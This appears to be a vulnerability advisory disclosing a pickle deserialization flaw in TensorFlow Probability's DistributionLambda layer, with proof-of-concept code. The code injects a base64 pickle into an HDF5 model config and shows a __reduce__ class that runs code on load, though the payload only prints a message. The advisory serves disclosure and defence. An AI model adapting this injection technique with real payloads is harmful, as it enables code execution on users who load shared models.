TensorFlow Probability
Vulnerability Report

Deserialization of untrusted data leading to arbitrary code execution

SAI Advisory Reference Number

SAI-ADV-2024-001

Summary

Arbitrary code execution can be achieved through the deserialization performed by the function _deserialize_function in tensorflow_probability/python/layers/distribution_layer.py. An attacker can inject a malicious pickle object into an HDF5-formatted model file, under the make_distribution_fn key of a DistributionLambda layer. When the model is loaded, the object is deserialized via pickle, executing the malicious code on the victim's machine.

Products Impacted

This potential attack vector is present in TensorFlow Probability v0.7 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

To replicate this attack, we create a basic sample model based on examples found in the docstrings within the code:

import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import tf_keras
from tensorflow_probability.python.distributions import normal as normal_lib
from tensorflow_probability.python.layers import distribution_layer

tfk = tf_keras
tfkl = tf_keras.layers
tfd = tfp.distributions
tfpl = tfp.layers

model = tfk.Sequential([
    tfkl.Dense(2, input_shape=(5,)),
    distribution_layer.DistributionLambda(lambda t: normal_lib.Normal(
        loc=t[..., 0:1], scale=tf.exp(t[..., 1:2])))
])

model.save("distribution_lambda_clean.h5")

We then use h5py to inject a base64-encoded pickle object into the model file as a new DistributionLambda layer. The encoded string is stored in that layer's config under the make_distribution_fn key:

{"class_name": "DistributionLambda", 
"config": {"name": "distribution_lambda", "trainable": true, 
"dtype": "float32", "function": ["4wA...Q==\n", 
null, ["sample", "<lambda>"]], "function_type": "lambda", 
"module": "tensorflow_probability.python.layers.distribution_layer", 
"output_shape": null, "output_shape_type": "raw", 
"output_shape_module": null, "arguments": {}, 
"make_distribution_fn": "gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SMFEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu", 
"convert_to_tensor_fn": "sample"}}]}}

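The injected value can be examined without executing it. The following is a minimal sketch using only the standard library: it decodes the make_distribution_fn string from a trimmed copy of the layer config above and lists the pickle opcodes with pickletools.genops, which parses the stream but does not run it. The helper name describe_pickle and the trimmed JSON fragment are illustrative assumptions, not part of TensorFlow Probability.

```python
import codecs
import json
import pickletools

# Trimmed copy of the injected layer config shown above (illustrative fragment;
# only the keys relevant to this check are kept).
layer_json = """
{"class_name": "DistributionLambda",
 "config": {"name": "distribution_lambda",
            "make_distribution_fn": "gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SMFEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu",
            "convert_to_tensor_fn": "sample"}}
"""


def describe_pickle(encoded):
    """Hypothetical helper: list (opcode name, argument) pairs of a
    base64-encoded pickle. The pickle is parsed, never loaded."""
    raw = codecs.decode(encoded.encode("ascii"), "base64")
    return [(opcode.name, arg) for opcode, arg, _pos in pickletools.genops(raw)]


layer = json.loads(layer_json)
ops = describe_pickle(layer["config"]["make_distribution_fn"])

op_names = [name for name, _ in ops]
string_args = [arg for _, arg in ops if isinstance(arg, str)]

# A pickle that imports a callable (GLOBAL / STACK_GLOBAL) and then calls it
# (REDUCE) will run code when passed to pickle.loads.
imports_callable = "GLOBAL" in op_names or "STACK_GLOBAL" in op_names
calls_callable = "REDUCE" in op_names

print(string_args)
print(imports_callable, calls_callable)
```

For the value above, the string arguments are builtins, print, and Injection successful, and both flags are true: the stream looks up builtins.print and calls it with that message at load time.
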
We then make a call to load the model from the perspective of a victim user:

import tensorflow as tf
import tensorflow_probability as tfp

loaded_model = tf.keras.models.load_model(
    'distribution_lambda_clean.h5', custom_objects={
        'DistributionLambda': tfp.layers.DistributionLambda
    })

This sends the model through _deserialize_function, which base64-decodes the value stored under make_distribution_fn and runs pickle.loads on it, leading to the execution of the injected arbitrary code (in our case, printing ‘Injection successful’):

import codecs
import pickle

def _deserialize_function(code):
  raw_code = codecs.decode(code.encode('ascii'), 'base64')
  return pickle.loads(raw_code)
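
The reason these two lines are sufficient for code execution can be reproduced in isolation. The sketch below uses only the standard library and a harmless print call. The class PrintOnLoad and the functions encode_like_model_config and deserialize_like_tfp are hypothetical names introduced for illustration; the last one mirrors the body of _deserialize_function quoted above rather than importing it from TensorFlow Probability.

```python
import codecs
import contextlib
import io
import pickle


class PrintOnLoad:
    """Hypothetical stand-in for an attacker-controlled object."""

    def __reduce__(self):
        # Instead of object state, pickle records the instruction
        # "call print('Injection successful')" to rebuild this object.
        return (print, ("Injection successful",))


def encode_like_model_config(obj):
    """Pickle obj and base64-encode it as ASCII text, the form in which
    such a value would sit in a model config string."""
    return codecs.encode(pickle.dumps(obj, protocol=4), "base64").decode("ascii")


def deserialize_like_tfp(code):
    """Mirror of the two lines of _deserialize_function quoted above."""
    raw_code = codecs.decode(code.encode("ascii"), "base64")
    return pickle.loads(raw_code)


encoded = encode_like_model_config(PrintOnLoad())

# Capture stdout so the side effect of loading is visible as a value.
buffer = io.StringIO()
with contextlib.redirect_stdout(buffer):
    result = deserialize_like_tfp(encoded)

captured = buffer.getvalue()
print(repr(result), repr(captured))
```

Loading returns None (the return value of print) and the message is written to stdout as a side effect of pickle.loads itself. No method of the loaded object has to be called afterwards, so any callable reachable by import could be substituted for print.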